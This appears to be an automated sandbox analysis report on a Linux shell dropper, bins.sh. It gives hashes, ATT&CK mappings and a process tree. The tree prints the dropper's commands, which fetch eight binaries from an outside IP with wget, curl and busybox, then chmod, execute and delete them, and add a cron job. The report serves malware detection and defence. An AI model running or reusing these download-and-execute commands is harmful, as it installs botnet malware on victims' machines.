9d5e5b6c3a805c2e3779d7528fa35a68acca84a3d74f139e275a1aead390062c

Analysis

max time kernel
14s
max time network
40s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
01-11-2024 13:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

c239c7e3d4676bbf2bae53fcd138debd
SHA1

deee5ef8465e8f056bd304b7ee07072fcfefa338
SHA256

9d5e5b6c3a805c2e3779d7528fa35a68acca84a3d74f139e275a1aead390062c
SHA512

6278894728e90773051729e86f214c9c31b05daf7d969d1cc30c7576447092c1a682973a1f6d923ee5a11043fbec3f3aa0e85505d5d77c42244bba077900387b
SSDEEP

192:MyXni5tYRO6XY4/MVeZYswMZqsPuwMZqsP3A+O6XY4pXni5tT:ZjMVOYu

Score

7^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmod

pid process

798 chmod
805 chmod
812 chmod
680 chmod
702 chmod
735 chmod
753 chmod
792 chmod

pid	process
798	chmod
805	chmod
812	chmod
680	chmod
702	chmod
735	chmod
753	chmod
792	chmod

Executes dropped EXE 8 IoCs

Processes:

UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4qX8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsExzCezgyrk5TN6d5wylqimTHoTPbm0hRYZOOZk1THCfmr46R8aqStMe6bpR4zw9dKV9UDfVMmbenTNnjxokodwqr9MJLLN2Drmjfb1N4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji

ioc	pid	process
/tmp/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb	681	UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
/tmp/1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q	703	1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q
/tmp/X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13	736	X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13
/tmp/JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE	754	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
/tmp/xzCezgyrk5TN6d5wylqimTHoTPbm0hRYZO	793	xzCezgyrk5TN6d5wylqimTHoTPbm0hRYZO
/tmp/OZk1THCfmr46R8aqStMe6bpR4zw9dKV9UD	799	OZk1THCfmr46R8aqStMe6bpR4zw9dKV9UD
/tmp/fVMmbenTNnjxokodwqr9MJLLN2Drmjfb1N	806	fVMmbenTNnjxokodwqr9MJLLN2Drmjfb1N
/tmp/4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji	813	4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji

Renames itself 1 IoCs

Processes:

JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE

pid process

756 JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.63qHZY crontab
Enumerates running processes
Discovers information about currently running processes on the system

pid	process
756	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.63qHZY	crontab

Checks CPU configuration 1 TTPs 8 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsEcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/26/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/42/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/224/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/645/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/2/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/3/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/28/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/778/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/13/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/683/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/810/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/4/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/147/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/784/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/9/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/12/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/29/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/654/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/601/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/773/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/5/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/278/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/774/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/797/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/809/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/8/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/324/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/639/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/19/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/811/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/816/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/602/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/787/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/104/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/137/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/599/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/802/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/308/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/43/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/7/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/165/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/777/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/74/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/139/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/724/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/95/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/145/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/596/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/785/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/140/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/647/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/728/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
File opened for reading	/proc/17/cmdline	JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE

System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

wgetbusyboxwgetcurlrmcurl4040u0AX8WPNeDZOn8ps4b79gQfbuIp7jirmbusybox1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q

pid process

809 wget
811 busybox
685 wget
687 curl
706 rm
810 curl
813 4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji
815 rm
697 busybox
703 1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q

pid	process
809	wget
811	busybox
685	wget
687	curl
706	rm
810	curl
813	4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji
815	rm
697	busybox
703	1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q

Writes file to tmp directory 16 IoCs

Malware often drops required files in the /tmp directory.

Processes:

busyboxbusyboxcurlbusyboxbusyboxbusyboxcurlwgetbusyboxwgetcurlbusyboxcurlwgetwgetbusybox

description	ioc	process
File opened for modification	/tmp/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb	busybox
File opened for modification	/tmp/1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q	busybox
File opened for modification	/tmp/X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13	curl
File opened for modification	/tmp/JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE	busybox
File opened for modification	/tmp/OZk1THCfmr46R8aqStMe6bpR4zw9dKV9UD	busybox
File opened for modification	/tmp/fVMmbenTNnjxokodwqr9MJLLN2Drmjfb1N	busybox
File opened for modification	/tmp/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb	curl
File opened for modification	/tmp/X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13	wget
File opened for modification	/tmp/X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13	busybox
File opened for modification	/tmp/JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE	wget
File opened for modification	/tmp/JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE	curl
File opened for modification	/tmp/4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji	busybox
File opened for modification	/tmp/1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q	curl
File opened for modification	/tmp/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb	wget
File opened for modification	/tmp/1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q	wget
File opened for modification	/tmp/xzCezgyrk5TN6d5wylqimTHoTPbm0hRYZO	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:647

/bin/rm
/bin/rm bins.sh
2⤵
PID:649

/usr/bin/wget
wget http://87.120.84.230/bins/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
2⤵
- Writes file to tmp directory
PID:651

/usr/bin/curl
curl -O http://87.120.84.230/bins/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:671

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
2⤵
- Writes file to tmp directory
PID:679

/bin/chmod
chmod 777 UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
2⤵
- File and Directory Permissions Modification
PID:680

/tmp/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
./UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
2⤵
- Executes dropped EXE
PID:681

/bin/rm
rm UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
2⤵
PID:684

/usr/bin/wget
wget http://87.120.84.230/bins/1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q
2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:685

/usr/bin/curl
curl -O http://87.120.84.230/bins/1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q
2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:687

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q
2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:697

/bin/chmod
chmod 777 1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q
2⤵
- File and Directory Permissions Modification
PID:702

/tmp/1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q
./1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q
2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:703

/bin/rm
rm 1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q
2⤵
- System Network Configuration Discovery
PID:706

/usr/bin/wget
wget http://87.120.84.230/bins/X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13
2⤵
- Writes file to tmp directory
PID:707

/usr/bin/curl
curl -O http://87.120.84.230/bins/X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:717

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13
2⤵
- Writes file to tmp directory
PID:730

/bin/chmod
chmod 777 X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13
2⤵
- File and Directory Permissions Modification
PID:735

/tmp/X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13
./X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13
2⤵
- Executes dropped EXE
PID:736

/bin/rm
rm X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13
2⤵
PID:738

/usr/bin/wget
wget http://87.120.84.230/bins/JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
2⤵
- Writes file to tmp directory
PID:740

/usr/bin/curl
curl -O http://87.120.84.230/bins/JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:745

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
2⤵
- Writes file to tmp directory
PID:748

/bin/chmod
chmod 777 JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
2⤵
- File and Directory Permissions Modification
PID:753

/tmp/JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
./JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:754

/bin/sh
sh -c "crontab -l"
3⤵
PID:757

/usr/bin/crontab
crontab -l
4⤵
PID:758

/bin/sh
sh -c "crontab -"
3⤵
PID:760

/usr/bin/crontab
crontab -
4⤵
- Creates/modifies Cron job
PID:761

/bin/rm
rm JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE
2⤵
PID:776

/usr/bin/wget
wget http://87.120.84.230/bins/xzCezgyrk5TN6d5wylqimTHoTPbm0hRYZO
2⤵
PID:781

/usr/bin/curl
curl -O http://87.120.84.230/bins/xzCezgyrk5TN6d5wylqimTHoTPbm0hRYZO
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:783

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/xzCezgyrk5TN6d5wylqimTHoTPbm0hRYZO
2⤵
- Writes file to tmp directory
PID:785

/bin/chmod
chmod 777 xzCezgyrk5TN6d5wylqimTHoTPbm0hRYZO
2⤵
- File and Directory Permissions Modification
PID:792

/tmp/xzCezgyrk5TN6d5wylqimTHoTPbm0hRYZO
./xzCezgyrk5TN6d5wylqimTHoTPbm0hRYZO
2⤵
- Executes dropped EXE
PID:793

/bin/rm
rm xzCezgyrk5TN6d5wylqimTHoTPbm0hRYZO
2⤵
PID:794

/usr/bin/wget
wget http://87.120.84.230/bins/OZk1THCfmr46R8aqStMe6bpR4zw9dKV9UD
2⤵
PID:795

/usr/bin/curl
curl -O http://87.120.84.230/bins/OZk1THCfmr46R8aqStMe6bpR4zw9dKV9UD
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:796

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/OZk1THCfmr46R8aqStMe6bpR4zw9dKV9UD
2⤵
- Writes file to tmp directory
PID:797

/bin/chmod
chmod 777 OZk1THCfmr46R8aqStMe6bpR4zw9dKV9UD
2⤵
- File and Directory Permissions Modification
PID:798

/tmp/OZk1THCfmr46R8aqStMe6bpR4zw9dKV9UD
./OZk1THCfmr46R8aqStMe6bpR4zw9dKV9UD
2⤵
- Executes dropped EXE
PID:799

/bin/rm
rm OZk1THCfmr46R8aqStMe6bpR4zw9dKV9UD
2⤵
PID:801

/usr/bin/wget
wget http://87.120.84.230/bins/fVMmbenTNnjxokodwqr9MJLLN2Drmjfb1N
2⤵
PID:802

/usr/bin/curl
curl -O http://87.120.84.230/bins/fVMmbenTNnjxokodwqr9MJLLN2Drmjfb1N
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:803

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/fVMmbenTNnjxokodwqr9MJLLN2Drmjfb1N
2⤵
- Writes file to tmp directory
PID:804

/bin/chmod
chmod 777 fVMmbenTNnjxokodwqr9MJLLN2Drmjfb1N
2⤵
- File and Directory Permissions Modification
PID:805

/tmp/fVMmbenTNnjxokodwqr9MJLLN2Drmjfb1N
./fVMmbenTNnjxokodwqr9MJLLN2Drmjfb1N
2⤵
- Executes dropped EXE
PID:806

/bin/rm
rm fVMmbenTNnjxokodwqr9MJLLN2Drmjfb1N
2⤵
PID:808

/usr/bin/wget
wget http://87.120.84.230/bins/4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji
2⤵
- System Network Configuration Discovery
PID:809

/usr/bin/curl
curl -O http://87.120.84.230/bins/4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji
2⤵
- Checks CPU configuration
- System Network Configuration Discovery
PID:810

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji
2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:811

/bin/chmod
chmod 777 4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji
2⤵
- File and Directory Permissions Modification
PID:812

/tmp/4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji
./4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji
2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:813

/bin/rm
rm 4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji
2⤵
- System Network Configuration Discovery
PID:815

/usr/bin/wget
wget http://87.120.84.230/bins/dJnnOBJeyx15I6lBptmVddqjHWm4ADuTsN
2⤵
PID:816

/usr/bin/curl
curl -O http://87.120.84.230/bins/dJnnOBJeyx15I6lBptmVddqjHWm4ADuTsN
2⤵
PID:817

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q

Filesize
93KB

MD5
8fad5e89ce3d2b6159ac2ce2fdf7c084

SHA1
27105a304b9bb7cd8a663d1b4da1d92fd8eea355

SHA256
24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6

SHA512
71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc

Download Submit
/tmp/4040u0AX8WPNeDZOn8ps4b79gQfbuIp7ji

Filesize
84KB

MD5
64ece99ca4ab1c1405f5a3335d64a960

SHA1
b7395f2320a5bdadb78943b268708965cdbd1d74

SHA256
aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae

SHA512
bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41

Download Submit
/tmp/JTbAAfj2S2h6fSWQD7hUkhwPcHXkJpuCsE

Filesize
108KB

MD5
c97a9c55ddb153e8bfce38f201d2cffb

SHA1
3970452f27327f98c2e3fdcabf0390067b48bd62

SHA256
138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c

SHA512
1734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e

Download Submit
/tmp/OZk1THCfmr46R8aqStMe6bpR4zw9dKV9UD

Filesize
93KB

MD5
27a1a1941f224eff6a4babf2495e3692

SHA1
86fae66a698f6280353e470ffadfb64441b03e83

SHA256
ab610b9f57ce293287cf9d4b3d47024ee73c81d8542247e26d1f0db2d5144179

SHA512
cf02927d9313f43ab5d04c7570b71cd722a5772642eac72feccdf4612985e29b399a7bbdff5de65d352b92f168c6934b0f0851a28c58a4814fffe38a0d884934

Download Submit
/tmp/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb

Filesize
80KB

MD5
22c527269cbd9b42f4ade79f52757efb

SHA1
c2456188a49af93b0d07af2a7cc1346d5be510bd

SHA256
100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97

SHA512
7b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53

Download Submit
/tmp/X8BkmbBbvJCLuG0bVmyq4pOKBrJBJpBt13

Filesize
101KB

MD5
a7e686eb3f74b104a5520f08cfd54eb5

SHA1
58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b

SHA256
617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07

SHA512
2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df

Download Submit
/tmp/fVMmbenTNnjxokodwqr9MJLLN2Drmjfb1N

Filesize
95KB

MD5
c20c610e14b8e59f5f8258a55fe7f27d

SHA1
e59a0b83d9882f2770f052a213cad25b0cbd53fc

SHA256
adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b

SHA512
dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2

Download Submit
/tmp/xzCezgyrk5TN6d5wylqimTHoTPbm0hRYZO

Filesize
129KB

MD5
54bec959d900ad930dc662f8092da57d

SHA1
9ae7ad9018eeac5aa89bcde68ec683a364ac7d55

SHA256
b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12

SHA512
904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40

Download Submit
/var/spool/cron/crontabs/tmp.63qHZY

Filesize
210B

MD5
f1bae8cc003f343865511edd651a5e7f

SHA1
9122dd3c8c198a6ef03ed029621011219bd2c6fb

SHA256
7e614bf81f23e3a5175fbdc3b11d94ee64d0c44d3e22951be76e6cf38fc965e3

SHA512
88c67d579d57968c55e66feb75dfb569e81b65c0cf19ae7ebc049d969c72e868a256781ca01a8c0450558b5b2d5b9852da19726d59991c45d5efec91a00f6a80

Download Submit